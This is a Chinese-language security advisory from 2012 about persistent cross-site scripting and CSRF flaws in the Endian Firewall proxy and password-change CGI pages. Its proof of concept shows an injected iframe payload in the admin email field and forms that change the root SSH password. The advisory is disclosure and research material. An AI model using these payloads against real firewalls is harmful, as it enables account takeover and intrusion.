发布日期:2012-03-01
更新日期:2012-03-05
受影响系统:
endian Endian Firewall Community 2.x
endian UTM Software Appliance 2.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 52263
Endian Firewall可提供路由/防火墙和统一威胁管理的开源GNU/Linux发行版。
Endian UTM Software Appliance和Endian Firewall Community在实现上存在多个漏洞,通过"PROXY_PORT"、"VISIBLE_HOSTNAME"和"ADMIN_MAIL_ADDRESS"参数输入到gi-bin/proxyconfig.cgi时没有正确过滤,可造成在受影响站点用户浏览器中执行HTML和脚本代码。
<*来源:Benjamin Kunz Mejri
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Benjamin Kunz Mejri ()提供了如下测试方法:
Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers with high required user inter action or local low privileged user accounts.
For demonstration or reproduce ...
1.1
Example Code Review: Input Validation Vulnerabilities (Persistent Inject)
Server: demo.endian.com/
Path: /cgi-bin/
File: proxyconfig.cgi
<div> <div></div>
<div>
<script type="text/javascript">
$(document).ready(function() {
/* Enable visualization of service notifications */
display_notifications(["squid","dansguardian","havp","sarg"], {"startMessage": "Proxy settings are being
applied. Please hold...","updateContent": ".service-switch-form","type": "observe","endMessage": "Proxy settings have been
applied successfully.","interval": "500"});
})
</script>
<div>
<div>
<table cellpadding="0" cellspacing="0">
<tr>
<td valign="middle"><img src="https://www.linuxidc.com/images/bubble_red_sign.png" alt="" /></td>
<td valign="middle">">"<iframe src=https://vulnerability-lab.com width=600 height=600>@aollamer.de"
at "Email used for notification (cache admin)" is not valid!(or?@rem0ve)<br /></td>
</tr>
</table>
</div>
Reference(s):
https://www.example.com/cgi-bin/proxyconfig.cgi
https://www.example.com/cgi-bin/hosts.cgi
https://www.example.com/cgi-bin/dhcp.cgi
1.2
Example Code Review: Cross Site Request Forgery Vulnerabilities (Non-Persistent)
Server: demo.endian.com/
Path: /cgi-bin/
File: hotspot-changepw.cgi or changepw.cgi
<form action="/cgi-bin/changepw.cgi" method="post">
<div>
<input type='hidden' value='save' />
<div><h2>SSH Password (root)</h2></div>
<div>
<span>
<label for="username">Password *</label>
<input type="password" SIZE="5" /></span>
... or
<form enctype='multipart/form-data' method='post' action='/cgi-bin/hotspot-changepw.cgi'>
<input type='hidden' value='save' />
<table>
<tr>
<td>Password:</td>
<td><input type='password' /></td>
<td>Again:</td>
<td><input type='password' /></td>
<td><input type='submit' value='Save' /></td>
</tr>
</table>
</form>
References:
https://www.example.com/cgi-bin/changepw.cgi
https://www.example.com/cgi-bin/hotspot-changepw.cgi
建议:
--------------------------------------------------------------------------------
厂商补丁:
endian
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: